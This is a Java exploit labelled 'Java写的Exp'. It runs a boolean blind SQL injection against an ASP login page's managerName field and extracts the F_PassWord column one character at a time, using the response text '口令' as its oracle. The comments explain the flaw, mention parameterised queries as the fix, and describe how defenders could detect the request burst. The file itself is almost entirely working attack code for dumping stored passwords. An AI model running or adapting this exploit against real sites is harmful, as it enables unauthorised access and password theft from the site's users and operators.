Java写的Exp:
package kk;
import java.io.*;
import java.net.*;
/**
 * Proof-of-concept for a boolean-based blind SQL injection in the {@code managerName}
 * field of a {@code /system/chklogin.asp} login form (the host is a placeholder).
 *
 * <p>The request body closes the string literal with a single quote and appends
 * {@code or mid(F_PassWord,Num,1)='Str}, so the login condition becomes true only when
 * character {@code Num} of the {@code F_PassWord} column equals {@code Str}. The server-side
 * query is not shown here; presumably it concatenates {@code managerName} straight into
 * the SQL text, and a parameterized query would close the hole.
 *
 * <p>The response page is the oracle: a body containing "口令" (Chinese for "password") is
 * taken as a correct guess. Presumably the application answers "wrong password" only when
 * the user-name clause matched a row; returning one identical message for every failed
 * login removes that signal.
 *
 * <p>Defender view: a full run sends up to 16 x 36 = 576 POST requests to the login
 * endpoint, each with a single quote and {@code mid(} inside {@code managerName}. The fixed
 * user name and the fixed password value {@code 123456} make the burst easy to spot in web
 * logs and easy to throttle with per-client rate limiting.
 */
public class PostResquest {
    // Candidate characters tried for every position: the digits, then lowercase letters.
    // The order is kept exactly as in the original listing ("z" comes before "y").
    private String[] key = {
        "1", "2", "3", "4", "5", "6", "7", "8", "9", "0",
        "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
        "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "z", "y"
    };

    /**
     * Runs the whole extraction from the constructor: for each of 16 character positions
     * it posts one request per candidate until the response contains the marker text,
     * then prints that candidate to standard output. If no candidate matches a position
     * it prints an error message and stops.
     *
     * <p>I/O failures are reported with a stack trace; nothing is rethrown.
     */
    public PostResquest() {
        String urlStr = "http://www.xxxxx.com/system/chklogin.asp";
        // "Num" and "Str" are placeholders substituted below, not part of the SQL itself.
        String value = "managerName=asdads'or%20mid(F_PassWord,Num,1)='Str&tpassWord=123456&surl=&submit.x=0&submit.y=0";
        try {
            URL target = new URL(urlStr);
            // 16 positions are probed; presumably the stored value is a 16-character string.
            for (int position = 1; position <= 16; position++) {
                String positionBody = value.replaceAll("Num", String.valueOf(position));
                boolean matched = false;
                for (String candidate : key) {
                    // A fresh connection per guess; setDoOutput(true) turns the request into a POST.
                    HttpURLConnection http = (HttpURLConnection) target.openConnection();
                    http.setDoOutput(true);
                    String requestBody = positionBody.replaceAll("Str", candidate);

                    OutputStreamWriter bodyWriter = new OutputStreamWriter(http.getOutputStream());
                    bodyWriter.write(requestBody);
                    bodyWriter.flush();
                    bodyWriter.close();

                    // The reader decodes with the platform default charset; every line is then
                    // re-encoded with that default and decoded again as gb2312.
                    BufferedReader responseReader =
                            new BufferedReader(new InputStreamReader(http.getInputStream()));
                    StringBuilder page = new StringBuilder();
                    for (String row = responseReader.readLine();
                            row != null;
                            row = responseReader.readLine()) {
                        page.append(new String(row.getBytes(), "gb2312")).append("\r\n");
                    }

                    // Marker present: the injected comparison was true for this candidate.
                    if (page.indexOf("口令") > -1) {
                        System.out.print(candidate);
                        matched = true;
                        break;
                    }
                }
                // Every candidate was rejected for this position: report the failure and abort.
                if (!matched) {
                    System.out.println("出错了");
                    return;
                }
            }
        } catch (MalformedURLException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /** Entry point: constructing the object performs the run. */
    public static void main(String[] args) {
        new PostResquest();
    }
}